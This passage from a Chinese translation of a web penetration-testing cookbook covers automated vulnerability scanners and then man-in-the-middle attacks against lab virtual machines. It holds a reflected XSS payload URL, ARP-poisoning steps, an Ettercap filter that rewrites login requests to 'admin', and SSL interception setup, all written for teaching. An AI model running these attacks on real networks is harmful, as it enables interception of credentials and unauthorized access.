 93 |     我们会扫描 vulnerable_vm 中的 Peruggia 应用，将输出保存为 HTML 格式，保存到` wapiti_result`目录中，并跳过 SQL 盲注检测。
 94 |     
 95 | 2.  如果我们打开了报告目录，和`index.html`文件，我们会看到一些这样的东西：
 96 | 
 97 |     ![](img/5-2-1.jpg)
 98 | 
 99 |     这里，我们可以看到 Wapiti 发现了 12 个 XSS 和 20 个文件处理漏洞。
100 |     
101 | 3.  现在点击` Cross Site Scripting`（跨站脚本）。
102 | 
103 | 4.  选项某个漏洞并点击`HTTP Request`。我们选择第二个，选中并复制请求的 URL 部分。
104 | 
105 |     ![](img/5-2-2.jpg)
106 |     
107 | 5.  现在，我们将 URL 粘贴到浏览器中，像这样：`http://192.168.56.102/ peruggia/index.php?action=comment&pic_id=%3E%3C%2Fform%3E%3Cscr ipt%3Ealert%28%27wxs0lvms89%27%29%3C%2Fscript%3E`。
108 | 
109 |     ![](img/5-2-3.jpg)
110 |     
111 |     我们确实发现了 XSS 漏洞。
112 |     
113 | ### 工作原理
114 | 
115 | 这个秘籍中，我们跳过了 SQL 盲注检测（`-m "-blindsql"`），因为这个应用存在这个漏洞。它会触发超时错误，使 Wapiti 在扫描完成之前关闭，因为 Wapiti 通过输入 `sleep()`命令来测试多次，直到服务器超过了超时门槛。同时，我们为输出选择了 HTML 格式（`-o html`），`wapiti_result`作为报告的目标目录，我们也可以选择其他格式，例如，JSON、OpenVAS、TXT 或 XML。
116 | 
117 | Wapiti 拥有一些其它的有趣的选项，它们是：
118 | 
119 | +   `-x <URL>`：从扫描中排除特定的 URL，对于登出和密码修改 URL 很实用。
120 | 
121 | +   `-i <file>`：从 XML 文件中恢复之前保存的扫描。文件名称是可选的，因为如果忽略的话 Wapiti 从`scan`文件夹中读取文件。
122 | 
123 | +   `-a <login%password>`：为 HTTP 登录使用特定的证书。
124 | 
125 | +   `--auth-method <method>`：为`-a`选项定义授权方式，可以为`basic`，`digest`，`kerberos` 或 `ntlm`。
126 | 
127 | +   `-s <URL>`：定义要扫描的 URL。
128 | 
129 | +   `-p <proxy_url>`：使用 HTTP 或 HTTPS 代理。
130 | 
131 | ## 5.3 使用 OWASP ZAP 扫描漏洞
132 | 
133 | OWASP ZAP 是我们已经在这本书中使用过的工具，用于不同的任务，并且在它的众多特性中，包含了自动化的漏洞扫描器。它的使用和报告生成会在这个秘籍中涉及。
134 | 
135 | ### 准备
136 | 
137 | 在我们使用 OWASP ZAP 成功执行漏洞扫描之前，我们需要爬取站点：
138 | 
139 | 1.  打开 OWASP ZAP 并配置浏览器将其用作代理。
140 | 
141 | 2.  访问 `192.168.56.102/peruggia/`。
142 | 
143 | 3.  遵循第三章“使用 ZAP 的蜘蛛”中的指南。
144 | 
145 | ### 操作步骤
146 | 
147 | 1.  访问 OWASP ZAP 的`Sites`面板，并右击`peruggia`文件夹。
148 | 
149 | 2.  访问菜单中的`Attack | Active Scan`。
150 | 
151 |     ![](img/5-3-1.jpg)
152 | 
153 | 3.  新的窗口会弹出。这里，我们知道我们的应用和服务器使用哪种技术，所以，访问`Technology`标签页，并只勾选`MySQL`、`PostgreSQL`和`Linux`，以及`Apache`。
154 | 
155 |     ![](img/5-3-2.jpg)
156 |     
157 |     这里我们可以配置我们的扫描器的`Scope`（从哪里开始扫描、在什么上下文中，以及其它）、`Input Vectors`（选项是否你打算测试 GET 和 POST 请求、协议头、Cookie和其它选项）、` Custom Vectors `（向原始请求中添加特定的字符或单词作为攻击向量）、`Technology `（要执行什么技术特定的测试）、以及`Policy`（为特定测试选项配置参数）。
158 |     
159 | 4.  点击`Start Scan`。
160 | 
161 | 5.  `Active Scan `标签页会出现在面板顶部，并且所有请求都会出现在那里。当扫描完成时，我们可以在`ALerts`标签页中检查结果。
162 | 
163 |     ![](img/5-3-3.jpg)
164 |     
165 | 6.  如果我们选项某个警告，我们可以查看生成的请求，以及从服务器获得的响应。这允许我们分析攻击并判断是否是真正的漏洞，或者是误报。我们也可以使用这个信息来模糊测试，在浏览器中重放这个请求，或者深入挖掘以利用。为了生成 HTML 报告，就像前一个工具那样，在主菜单中访问`Report`之后选择` Generate HTML Report....`。
166 | 
167 | 7.  新的对话框会询问文件名和位置。例如，设置`zap_result. html`并且在完成时打开文件：
168 | 
169 |     ![](img/5-3-4.jpg)
170 |     
171 | ### 工作原理
172 | 
173 | OWASP ZAP 能够执行主动和被动漏洞扫描。被动扫描是 OWASP ZAP 在我们浏览过、发送数据和点击链接程中进行的非入侵测试。主动测试涉及对每个表单变量或请求值使用多种攻击字符串，以便检测服务器的响应是否带有我们叫做“脆弱行为”的东西。
174 | 
175 | OWASP ZAP 使用多种技术生成测试字串，它对于首次识别目标所使用的技术非常实用，以便优化我们的扫描并减少被检测到或导致服务崩溃的可能。
176 | 
177 | 这个工具的另一个有趣特性是，我们可以产生于漏洞检测中的请求，而且它的相应响应在检测的时候会位于相同窗口中。这允许我们快读判断它是真正的漏洞还是误报，以及是否要开发我们的漏洞证明（POC）还是开始利用。
178 | 
179 | ![](img/5-3-5.jpg)
180 | 
181 | ### 更多
182 | 
183 | 我们已经谈论到 Burp Suite。Kali 只包含了免费版本，它没有主动和被动扫描特性。强烈推荐你获得 Burp Suite 的专业版许可证，因为它拥有实用特性和免费版之上的改进，例如主动和被动漏洞扫描。
184 | 
185 | 被动漏洞扫描在我们使用 Burp Suite 作为浏览器的代理，并浏览网页时发生。Burp 会分析所有请求和响应，同时查找对应已知漏洞的模式。
186 | 
187 | 在主动扫描中，Burp 会发送特定的请求给服务器并检查响应来查看是否对应一些漏洞模式。这些请求是特殊构造的，用于触发带有漏洞的应用的特定行为。
188 | 
189 | ## 5.4 使用 w3af 扫描
190 | 
191 | w3af 支持应用审计和攻击框架。它是开源的，基于 Python 的 Web 漏洞扫描器。它拥有 GUI 和命令行界面，都带有相同的功能。这个秘籍中，我们会使用 w3af 的 GUI 配置扫描和报告选项来执行扫描。
192 | 
193 | ### 操作步骤
194 | 
195 | 1.  为了启动 w3af 我们可以从应用菜单栏选择它，通过浏览`Applications | 03 Web Application Analysis | w3af`，或者从终端中：
196 | 
197 |     ```
198 |     w3af_gui
199 |     ```
200 |     
201 | 2.  在`Profiles `部分中，我们选择`full_audit`。
202 | 
203 | 3.  在插件部分中，访问`crawl`并选择` web_spider `（已经选择的项目）。
204 | 
205 | 4.  我们不打算让扫描器测试所有服务器，而是我们让它测试应用。在插件部分中，选中`only_forward`选项并点击`Save`。
206 | 
207 |     ![](img/5-4-1.jpg)
208 |     
209 | 5.  现在，我们会告诉 w3af 在完成时生成 HTML 报告。访问`output `插件并选中`html_file`。
210 | 
211 | 6.  为了选择文件名称和保存报告的位置，修改`output_file`选项。这里我们会指定根目录下的`w3af_report.html`，点击`Save`。
212 | 
213 |     ![](img/5-4-2.jpg)
214 |     
215 | 7.  现在在`Target`文本框中，输入打算测试的 URL，这里是`http://192.168.56.102/WackoPicko/`，并点击`Start`。
216 | 
217 |     ![](img/5-4-3.jpg)
218 | 
219 | 8.  日志标签页会获得焦点，我们能够看到扫描的进程。我们需要等待它完成。
220 | 
221 | 9.  完成之后，切换到`Results`标签页，像这样：
222 | 
223 |     ![](img/5-4-4.jpg)
224 |     
225 | 0.  为了查看详细的报告，在浏览器中打开`w3af_report.html`HTML 文件。
226 | 
227 |     ![](img/5-4-5.jpg)
228 | 
229 | 
230 | ### 工作原理
231 | 
232 | w3af 使用配置文件来简化为扫描选择插件的任务，例如，我们可以定义只含有 SQL 注入的配置文件，它测试应用的 SQL 注入，不干其他的事情。` full_audit `配置使用一些插件，它们执行爬虫测试、提取可以用作密码的单词列表、测试大多数相关的 Web 漏洞，例如 XSS、SQLi、文件包含、目录遍历以及其它。我们修改了`web_spider`插件来前向爬取，以便我们可以专注于打算测试的应用，避免扫描到其它应用。我们也修改了输出插件来生成 HTML 报告，而不是控制台输出和文本文件。
233 | 
234 | w3af 也拥有一些工具，例如拦截代理、模糊测试器、文本编解码器、以及请求导出器，它可以将原始的请求转换为多种语言的源代码。
235 | 
236 | ### 更多
237 | 
238 | w3af 的 GUI 有时会不稳定。在它崩溃以及不能完成扫描的情况下，它的命令行界面可以提供相同的功能。例如，为了执行我们刚才执行的相同扫描，我们需要在终端中做下列事情：
239 | 
240 | ```
241 | w3af_console 
242 | profiles
243 | use full_audit 
244 | back 
245 | plugins 
246 | output config html_file 
247 | set output_file /root/w3af_report.html 
248 | save 
249 | back 
250 | crawl config web_spider 
251 | set only_forward True 
252 | save 
253 | back 
254 | back 
255 | target 
256 | set target http://192.168.56.102/WackoPicko/ 
257 | save 
258 | back 
259 | start
260 | ```
261 | 
262 | ## 5.5 使用 Vega 扫描器
263 | 
264 | Vega 是由加拿大公司 Subgraph 制作的 Web 漏洞扫描器，作为开源工具分发。除了是扫描器之外，它也可以用作拦截代理，以及在我们浏览器目标站点时扫描。
265 | 
266 | 这个秘籍中，我们会使用 Vega 来发现 Web 漏洞。
267 | 
268 | ### 操作步骤
269 | 
270 | 1.  从应用菜单中选择它，访问`Applications | Kali Linux | Web Applications | Web Vulnerability Scanners | vega`，或者通过终端来打开 Vega：
271 | 
272 |     ```
273 |     vega
274 |     ```
275 |     
276 | 2.  点击“开始新扫描“按钮。
277 | 
278 | 3.  新的对话框会弹出。在标为`Enter a base URI for scan`的输入框中，输入`http://192.168.56.102/WackoPicko`来扫描应用。
279 | 
280 |     ![](img/5-5-1.jpg)
281 |     
282 | 4.  点击`Next`。这里我们可以选择在应用上运行那个模块。让我们保持默认。
283 | 
284 |     ![](img/5-5-2.jpg)
285 | 
286 | 5.  点击`Finish`来开始扫描。
287 | 
288 |     ![](img/5-5-3.jpg)
289 |     
290 | 6.  当扫描完成时，我们可以通过访问左边的`Scan Alerts `树来检查结果。漏洞详情会在右边的面板中展示，像这样：
291 | 
292 |     ![](img/5-5-4.jpg)
293 |     
294 | ### 工作原理
295 | 
296 | Vega 的工作方式是首先爬取我们指定为目标的 URL，识别表单和其它可能的数据输入，例如 Cookie 或请求头。一旦找到了它们，Vega 尝试不同的输入，通过分析响应并将它们与已知漏洞模式匹配来识别漏洞。
297 | 
298 | 在 Vega 中，我们可以扫描单个站点或范围内的一组站点。我们可以通过选择在扫描中使用的模块，来选择要进行哪种测试。同样，我们可以使用身份（预保存的用户/密码组合）或者会话 Cookie来为站点认证，并且从测试中排除一些参数。
299 | 
300 | 作为重要的缺陷，它并没有报告生成或数据导出特性。所以我们需要在 Vega GUI 中查看所有的漏洞描述和详情。
301 | 
302 | ## 5.6 使用 Metasploit 的 Wmap 发现 Web 漏洞
303 | 
304 | Wmap 本身并不是漏洞扫描器，他是个 Metasploit 模块，使用所有框架中的 Web 漏洞和服务器相关的模块，并使它们协调加载和对目标服务器执行。它的结果并不会导出为报告，但是会作为 Metasploit 数据库中的条目。
305 | 
306 | 这个秘籍中，我们会使用 Wmap 来寻找 vulnerable_vm 中的漏洞，并使用 Metasploit 命令行工具来检查结果。
307 | 
308 | ### 准备
309 | 
310 | 在我们运行 Metasploit 的控制台之前，我们需要启动 所连接的数据库服务器，以便保存我们生成的结果：
311 | 
312 | ```
313 | service postgresql start
314 | ```
315 | 
316 | ### 操作步骤
317 | 
318 | 1.  启动终端并运行 Metasploit 控制台：
319 | 
320 |     ```
321 |     msfconsole 
322 |     ```
323 |     
324 | 2.  加载完成后，加载 Wmap 模块：
325 | 
326 |     ```
327 |     load wmap 
328 |     ```
329 |     
330 | 3.  现在，我们向 Wamp 中添加站点：
331 | 
332 |     ```
333 |     wmap_sites -a http://192.168.56.102/WackoPicko/ 
334 |     ```
335 |     
336 | 4.  如果我们打算查看注册的站点：
337 | 
338 |     ```
339 |     wmap_sites -l 
340 |     ```
341 |     
342 | 5.  现在我们将这个站点设为扫描目标：
343 | 
344 |     ```
345 |     wmap_targets -d 0 
346 |     ```
347 |     
348 | 6.  如果我们打算插件所选目标，我们可以使用：
349 | 
350 |     ```
351 |     wmap_targets -l 
352 |     ```
353 |     
354 |     ![](img/5-6-1.jpg)
355 |     
356 | 7.  现在，我们执行测试：
357 | 
358 |     ```
359 |     wmap_run -e
360 |     ```
361 |     
362 |     ![](img/5-6-2.jpg)
363 |     
364 | 8.  我们需要使用 Metasploit 的命令来检查记录的漏洞：
365 | 
366 |     ```
367 |     vulns 
368 |     wmap_vulns
369 |     ```
370 |     
371 |     ![](img/5-6-3.jpg)
372 |     
373 | ### 工作原理
374 | 
375 | Wmap 使用 Metasploit 的模块来扫描目标应用和服务器上的漏洞。它从 Metasploit 的数据库和模块中获取站点信息，并将结果发送到数据库中。这个集成的一个非常实用的层面是，如果我们执行多个服务器上的渗透测试，并且在测试中使用 Metasploit，Wmap 会自动获得所有 Web 服务器的 IP 地址，和已知 URL，并将它们集成为站点，以便当我们打算执行 Web 评估时，我们只需要从站点列表中选择目标。
376 | 
377 | 在执行`wmap_run`的时候，我们可以选择要执行哪个模块。通过`-m`选项和正则表达式。例如，下面的命令行会开启所有模块，除了包含`dos`的模块，这意味着没有拒绝服务测试：
378 | 
379 | ```
380 | wmap_run -m ^((?!dos).)*$ 
381 | ```
382 | 
383 | 另一个实用的选项是`-p`。它允许我们通过正则表达式选择我们打算测试的路径，例如，在下一个命令中，我们会检查所有包含单词`login`的 URL。
384 | 
385 | ```
386 | wmap_run -p ^.*(login).*$
387 | ```
388 | 
389 | 最后，如果我们打算导出我们的扫描结果，我们总是可以使用 Metasploit 的数据库特性。例如，在 MSF 控制台中使用下列命令来将整个数据库导出为 XML 文件。
390 | 
391 | ```
392 | db_export -f xml /root/database.xml
393 | ```
394 | 


--------------------------------------------------------------------------------
/ch8.md:
--------------------------------------------------------------------------------
  1 | # 第八章 中间人攻击
  2 | 
  3 | > 作者：Gilberto Najera-Gutierrez
  4 | 
  5 | > 译者：[飞龙](https://github.com/)
  6 | 
  7 | > 协议：[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/)
  8 | 
  9 | ## 简介
 10 | 
 11 | 中间人（MITM）攻击是一种攻击类型，其中攻击者将它自己放到两方之间，通常是客户端和服务端通信线路的中间。这可以通过破坏原始频道之后拦截一方的消息并将它们转发（有时会有改变）给另一方来实现。
 12 | 
 13 | 让我们观察下面这个例子：
 14 | 
 15 | ![](img/8-0-1.jpg)
 16 | 
 17 | Alice 连接到了 Web 服务器上，Bob打算了解 Alice 正在发送什么信息。于是 Bob 建立 MITM 攻击，通过告诉服务器他是 Alice，并且告诉 Alice 他是服务器。现在，所有 Alice 的请求都会发给 Bob，Bob 会将它们转发给服务器，并对服务器的响应做相同操作。这样，Bob 就能够拦截、读取或修改所有 Alice 和服务器之间的流量。
 18 | 
 19 | 虽然 MITM 攻击并不特定与 Web 攻击，了解如何执行它们，以及如何防止它们，对于任何渗透测试者都非常重要，因为它们可以用于偷取密码，劫持会话，或者执行 Web 应用中的非授权操作。
 20 | 
 21 | 这一章中，我们会建立起中间人攻击，并使用它来获得信息，以及执行更加复杂的攻击。
 22 | 
 23 | ## 8.1 使用 Ettercap 执行欺骗攻击
 24 | 
 25 | 地址解析协议（ARP）欺骗可能是最常见的 MITM 攻击。它基于一个事实，就是 ARP 并不验证系统所收到的响应。这就意味着，当 Alice 的电脑询问网络上的所有设备，“IP 为 xxx.xxx.xxx.xxx 的机器的 MAC 地址是什么”时，它会信任从任何设备得到的答复。该设备可能是预期的服务器，也可能是不是。ARP 欺骗或毒化的工作方式是，发送大量 ARP 响应给通信的两端，告诉每一端攻击者的 MAC 地址对应它们另一端的 IP 地址。
 26 | 
 27 | 这个秘籍中，我们会使用Ettercap 来执行 ARP 欺骗攻击，并将我们放到客户端和服务器之间。
 28 | 
 29 | ### 准备
 30 | 
 31 | 对于这个秘籍，我们会使用第一章配置的客户端虚拟机，和vulnerable_vm。客户端的 IP 是 192.168.56.101，vulnerable_vm 是 192.168.56.102。
 32 | 
 33 | ### 操作步骤
 34 | 
 35 | 1.  将两个虚拟机打开，我们的 Kali Linux（192.168.56.1）主机是攻击者的机器。打开终端窗口并输入下列命令：
 36 | 
 37 |     ```
 38 |     ettercap –G 
 39 |     ```
 40 |     
 41 |     从 Ettercap 的主菜单中，选择`Sniff | Unified Sniffing`。
 42 |     
 43 | 2.  在弹出的对话框中选择你打算使用的网络接口，这里我们选择`vboxnet0`，像这样：
 44 | 
 45 |     ![](img/8-1-1.jpg)
 46 |     
 47 | 3.  既然我们嗅探了网络，下一步就是识别哪个主机正在通信。访问主菜单的`Hosts`之后选择`Scan for hosts`。
 48 | 
 49 | 4.  从我们发现的主机中，选择我们的目标。从`Hosts `菜单栏中选择`Hosts list`。
 50 | 
 51 |     ![](img/8-1-2.jpg)
 52 |     
 53 | 5.  从列表中选择`192.168.56.101`，并点击`Add to Target 1`。
 54 | 
 55 | 6.  之后选择`192.168.56.102 `，之后点击`Add to Target 2`。
 56 | 
 57 | 7.  现在我们检查目标：在`Targets`菜单中，选择` Current targets`。
 58 | 
 59 |     ![](img/8-1-3.jpg)
 60 | 
 61 | 8.  我们现在准备好了开始欺骗攻击，我们的位置在服务器和客户端中间，在`Mitm `菜单中，选择`ARP poisoning`。
 62 | 
 63 | 9.  在弹出的窗口中，选中`Sniff remote connections`，然后点击`OK`。
 64 | 
 65 |     ![](img/8-1-4.jpg)
 66 | 
 67 | 这就结束了，我们现在可以看到在客户端和服务端之间的流量。
 68 | 
 69 | ### 工作原理
 70 | 
 71 | 在我们键入的第一个命令中，我们告诉 Ettercap 启动 GTK 界面。
 72 | 
 73 | > 其它界面选项为`-T`启动文本界面，`-C`启动光标（以 ASCII 文本），`-D`运行为守护进程，没有界面。
 74 | 
 75 | 之后，我们启动了 Ettercap 的嗅探功能。统一模式意味着我们会通过单一网络接口接受并发送信息。当我们的目标通过不同网络接口到达时，我们选择桥接模式。例如，如果我们拥有两个网卡，并且通过其一连接到客户端，另一个连接到服务端。
 76 | 
 77 | 在嗅探开始之后，我们选择了目标。
 78 | 
 79 | > 事先选择你的目标
 80 | 
 81 | > 单次攻击中，选择唯一必要主机作为目标非常重要，因为毒化攻击会生成大量网络流量，并导致所有主机的性能问题。在开始 MITM 攻击之前，弄清楚那两个系统会成为目标，并仅仅欺骗这两个系统。
 82 | 
 83 | 一旦设置了目标，我们就可以开始 ARP 毒化攻击。`Sniffing remote connections`意味着 Ettercap 会捕获和读取所有两端之间的封包，`Only poison one way`在我们仅仅打算毒化客户端，而并不打算了解来自服务器或网关的请求时（或者它拥有任何对 ARP 毒化的保护时）非常实用。
 84 | 
 85 | ## 8.2 使用 Wireshark 执行 MITM 以及捕获流量
 86 | 
 87 | Ettercap 可以检测到经过它传播的相关信息，例如密码。但是，在渗透测试的时候，它通常不足以拦截一些整数，我们可能要寻找其他信息，类似信用卡的号码，社会安全号码，名称，图片或者文档。拥有一个可以监听网络上所有流量的工具十分实用，以便我们保存和之后分析它们。这个工具是个嗅探器，最符合我们的目的的工具就是 Wireshark，它包含于 Kali Linux。
 88 | 
 89 | 这个秘籍中，我们会使用 Wireshark 来捕获所有在客户端和服务端之间发送的封包来获取信息。
 90 | 
 91 | ### 准备
 92 | 
 93 | 在开始之前我们需要让 MITM 工作。
 94 | 
 95 | ### 操作步骤
 96 | 
 97 | 1.  从 Kali `Applications`菜单的`Sniffing & Spoofing`启动 Wireshark，或者从终端中执行：
 98 | 
 99 |     ```
100 |     wireshark 
101 |     ```
102 |     
103 | 2.  当 Wireshark 加载之后，选项你打算用于捕获封包的网卡。我们这里选择`vboxnet0`，像这样：
104 | 
105 |     ![](img/8-2-1.jpg)
106 |     
107 | 3.  之后点击`Start`。你会立即看到 Wireshark 正在捕获 ARP 封包，这就是我们的攻击。
108 | 
109 | 
110 |     ![](img/8-2-2.jpg)
111 |     
112 | 4.  现在，来到客户端虚拟机，浏览`http://192.168.56.102/ dvwa`，并登陆 DVWA。
113 | 
114 | 5.  在 Wireshark 中的`info `区域中，查找来自`192.168.56.101`到`192.168.56.102`，带有 POST `/dvwa/login.php` 的 HTTP 封包。
115 | 
116 |     ![](img/8-2-3.jpg)
117 |     
118 |     如果我们浏览所有捕获的封包，我们会看到一个封包对应授权，并会看到我们可以以纯文本获得用户名和密码。
119 |     
120 |     > 使用过滤器
121 |     
122 |     > 我们可以在 Wireshark 中使用过滤器来只展示我们感兴趣的封包。例如，为了只查看 登录页面的 HTTP 请求，我们可以使用：`http. request.uri contains "login"`。
123 |     
124 |     如果我们查看 Ettercap 的窗口，我们也能看到用户名和密码，像这样：
125 |     
126 |     ![](img/8-2-4.jpg)
127 |     
128 |     通过捕获客户端和服务端之间的流量，攻击者能够提取和利用所有类型的敏感信息，例如用户名、密码、会话 Cookie、账户号码、信用卡号码、私人邮件，以及其它。
129 |     
130 | ### 工作原理
131 | 
132 | Wireshark 监听每个我们选择监听的接口上的封包，并在它的界面中显示。我们可以选择监听多个接口。
133 | 
134 | 当我们首先启动嗅探的时候，我们了解了 ARP 欺骗如何工作。它发送大量 ARP 封包给客户端和服务端，以便防止它们的地址解析表（ARP 表）从正当的主机获得正确的值。
135 | 
136 | 最后，当我们向服务器发送请求时，我们看到了 Wireshark 如何捕获所有包含在请求中的信息，包含协议、来源和目的地 IP。更重要的是，它包含了由客户端发送的数据，其中包含管理员密码。
137 | 
138 | ### 另见
139 | 
140 | 研究 Wireshark 数据有一些无聊，所以了解如何在捕获封包时使用显示过滤器非常重要。你可以访问下列站点来了解更多信息。
141 | 
142 | + https://www.wireshark.org/docs/wsug_html_chunked/ChWorkDisplayFilterSection.html
143 | + https://wiki.wireshark.org/DisplayFilters
144 | 
145 | 使用 Wireshark，你可以通过捕获过滤器来选择捕获哪种数据。这是非常实用的特性，尤其是执行 MITM攻击时生成大量流量的时候。你可以从下列站点中阅读更多信息。
146 | 
147 | + https://www.wireshark.org/docs/wsug_html_chunked/ChCapCaptureFilterSection.html
148 | + https://wiki.wireshark.org/CaptureFilters
149 | 
150 | ## 8.3 修改服务端和客户端之间的数据
151 | 
152 | 在执行 MITM 攻击时，我们不仅仅能够监听在受害者系统之间发送的任何数据，也能够修改请求和响应，因而按照我们的意图调整它们的行为。
153 | 
154 | 这个秘籍中，我们会使用 Ettercap 过滤器来检测封包是否包含我们感兴趣的信息，并触发改变后的操作。
155 | 
156 | ### 准备
157 | 
158 | 在开始之前我们需要让 MITM 工作。
159 | 
160 | ### 操作步骤
161 | 
162 | 1.  我们的第一步是创建过滤器文件。将下列代码保存到文本文件中（我们命名为`regex-replace-filter.filter`）:
163 | 
164 |     ```
165 |     # If the packet goes to vulnerable_vm on TCP port 80 (HTTP) 
166 |     if (ip.dst == '192.168.56.102'&& tcp.dst == 80) {
167 |         # if the packet's data contains a login page    
168 |         if (search(DATA.data, "POST")){        
169 |             msg("POST request");        
170 |             if (search(DATA.data, "login.php") ){
171 |                 msg("Call to login page");            
172 |                 # Will change content's length to prevent server from failing            
173 |                 pcre_regex(DATA.data, "Content-Length\:\ [0-9]*","Content-Length: 41");            
174 |                 msg("Content Length modified");            
175 |                 # will replace any username by "admin" using a regular expression            
176 |                 if (pcre_regex(DATA.data, "username=[a-zAZ]*&","username=admin&"))    {
177 |                     msg("DATA modified\n");              
178 |                 }            
179 |                 msg("Filter Ran.\n");        
180 |             }    
181 |         } 
182 |     }
183 |     ```
184 |     
185 |     > `#` 符号使注释。这个语法非常类似于 C，除了注释和一些不同。
186 |     
187 | 2.  下面我们需要为 Ettercap 编译过滤器来使用它。从终端中，执行下列命令。
188 | 
189 |     ```
190 |     etterfilter -o regex-replace-filter.ef regex-replace-filter.filter
191 |     ```
192 |     
193 |     ![](img/8-3-1.jpg)
194 |     
195 | 3.  现在，从 Ettercap 的菜单中，选择`Filters | Load a filter`，后面是`regexreplace-filter.ef`，并点击`Open`。
196 | 
197 |     我们会看到 Ettercap 的日志窗口中出现新的条目，表明新的过滤器已经加载了。
198 |     
199 |     ![](img/8-3-2.jpg
200 |     
201 | 4.  在客户端中，浏览` http://192.168.56.102/dvwa/ `并使用密码`admin`登陆任意用户，例如：`inexistentuser: admin`。
202 | 
203 |     ![](img/8-3-3.jpg)
204 |     
205 |     用户现在登陆为管理员，并且攻击者拥有了对两个用户都生效的密码。)
206 |     
207 | 5.  如果我们检查 Ettercap 的日志，我们可以看到我们编写在代码中的消息会出现在这里，像这样：
208 | 
209 |     ![](img/8-3-4.jpg)
210 |     
211 | ### 工作原理
212 | 
213 | ARP 欺骗攻击是更加复杂的攻击的开始。这个秘籍中，我们使用了 Ettercap 的封包过滤功能来识别带有特定内容的封包，并修改它来强制让用户以管理员登录应用。这也可以从服务端到客户端来完成，可以用来通过展示一些伪造信息来欺骗用户。
214 | 
215 | 我们的第一步是创建过滤脚本，它首先检查被分析的封包是否含有我们打算改变的信息，像这样：
216 | 
217 | ```
218 | if (ip.dst == '192.168.56.102'&& tcp.dst == 80) { 
219 | ```
220 | 
221 | 如果目标 IP 是  vulnerable_vm之一，且 TCP 端口是 80（默认 HTTP 端口号），它就是发往我们打算拦截的服务器的请求。
222 | 
223 | ```
224 | if (search(DATA.data, "POST")){    
225 |     msg("POST request");    
226 |     if (search(DATA.data, "login.php") ){
227 | ```
228 | 
229 | 如果请求使用 POST 方法，且去往`login.php`页面，它就是登录尝试，因为这是我们的目标应用接收登录尝试的方式。
230 | 
231 | ```
232 | pcre_regex(DATA.data, "Content-Length\:\ [0-9]*","Content-Length: 41");
233 | ```
234 | 
235 | 我们使用正则表达式来获取请求中的`Content-Length`参数，并将它的值改为 41，这是我们发送带有`admin/admin`凭证的登录封包的长度。
236 | 
237 | ```
238 | if (pcre_regex(DATA.data, "username=[a-zA-Z]*&","username=admin&")){    
239 |     msg("DATA modified\n");  
240 | } 
241 | ```
242 | 
243 | 同样，使用正则表达式，我们在请求中查找用户名称值，并将它替换为`admin`。
244 | 
245 | 消息（`msg`）仅仅用于跟踪和调试目的，可以被从脚本中忽略。
246 | 
247 | 在编写完脚本之后，我们使用 Ettercap 的 etterfilter 编译他，以便执行它。之后，我们在 Ettercap 中加载它，然后等待客户端连接。
248 | 
249 | ## 8.4 发起 SSL MITM 攻击
250 | 
251 | 如果我们使用我们目前的方法嗅探 HTTPS 会话，我们不能从中得到很多信息，因为所有通信都是加密的。
252 | 
253 | 为了拦截、读取和修改 SSL 和 TLS 的连接，我们需要做一系列准备步骤，来建立我们的 SSL 代理。SSLsplit 的仿作方式是使用两个证书，一个用于告诉服务器这是客户端，以便它可以接收和解密服务器的响应，另一个告诉客户端这是服务器。对于第二个证书，如果我们打算代替一个拥有自己的域名的网站，并且它的证书由认证中心（CA）签发，我们就需要让 CA 为我们签发根证书，但因为我们是攻击者，我们就需要自己来做。
254 | 
255 | 这个秘籍中，我们会配置我们自己的 CA，以及一些 IP 转发规则来执行 SSL 中间人攻击。
256 | 
257 | ### 操作步骤
258 | 
259 | 1.  首先，我们打算在 Kali 上创建 CA 私钥，所以在 root 终端中键入下列命令：
260 | 
261 |     ```
262 |     openssl genrsa -out certaauth.key 4096 
263 |     ```
264 |     
265 | 2.  现在让我们创建一个使用这个密钥签名的证书：
266 | 
267 |     ```
268 |     openssl req -new -x509 -days 365 -key certauth.key -out ca.crt 
269 |     ```
270 |     
271 | 3.  填充所需信息（或者仅仅对每个字段按下回车）。
272 | 
273 | 4.  下面，我们需要开启 IP 转发来开启系统的路由功能（将目标不是本地主机的 IP 包转发到网关）：
274 | 
275 |     ```
276 |     echo 1 > /proc/sys/net/ipv4/ip_forwar
277 |     ```
278 |     
279 | 5.  现在我们打算配置一些会泽来防止转发任何东西。首先，让我们检查我们的 iptables 的`nat`表中是否有任何东西：
280 | 
281 |     ```
282 |     iptables -t nat -L
283 |     ```
284 |     
285 |     ![](img/8-4-1.jpg)
286 |     
287 | 6.  如果有东西，你可能打算备份一下，因为我们会刷新它们，如下：
288 | 
289 |     ```
290 |     iptables -t nat -L > iptables.nat.bkp.txt 
291 |     ```
292 |     
293 | 7.  现在让我们刷新整个表。
294 | 
295 |     ```
296 |     iptables -t nat -F
297 |     ```
298 |     
299 | 8.  之后我们建立 PREROUTING 规则：
300 | 
301 |     ```
302 |     iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --toports 8080 
303 |     iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --toports 8443 
304 |     ```
305 |     
306 | 现在我们已经准备好嗅探加密连接。
307 | 
308 | ### 工作原理
309 | 
310 | 这个秘籍中，我们配置了 Kali 主机来充当 CA，这意味着它可以校验 SSLsplit 使用的证书。在前两步中，我们仅仅创建了私钥，和使用私钥签名的证书。
311 | 
312 | 下面，我们建立了端口转发规则。我们首先开启了转发选项，之后创建了 iptables 规则来将 80 端口的请求转发到 443（HTTP 到 HTTPS）。这是为了重定向请求。我们的 MITM 攻击会拦截 SSLsplit，便于它使用一个证书来解密收到的消息、处理它，使用另一个证书加密并发送到目的地。
313 | 
314 | ### 另见
315 | 
316 | 你应该了解更多加密证书以及 SSL 和 TLS 协议，还有 SSLsplit，可以访问这里：
317 | 
318 | + https://en.wikipedia.org/wiki/Public_key_certificate 
319 | + https://www.roe.ch/SSLsplit 
320 | + https://en.wikipedia.org/wiki/Iptables 
321 | + `man iptables`
322 | 
323 | ## 8.5 使用 SSLsplit 获得 SSL 数据
324 | 
325 | 在之前的密集中，我们准备了环境来攻击 SSL/TLS 连接。而这个秘籍中，我们会使用 SSLsplit 来完成 MITM 攻击并从加密连接中提取信息。
326 | 
327 | ### 准备
328 | 
329 | 我们需要在开始秘籍之前执行 ARP 欺骗攻击，并成功完成了上一个秘籍。
330 | 
331 | ### 操作步骤
332 | 
333 | 1.  首先，我们需要创建目录，其中 SSLsplit 在里面存放日志。打开终端并创建两个目录，像这样：
334 | 
335 |     ```
336 |     mkdir /tmp/sslsplit 
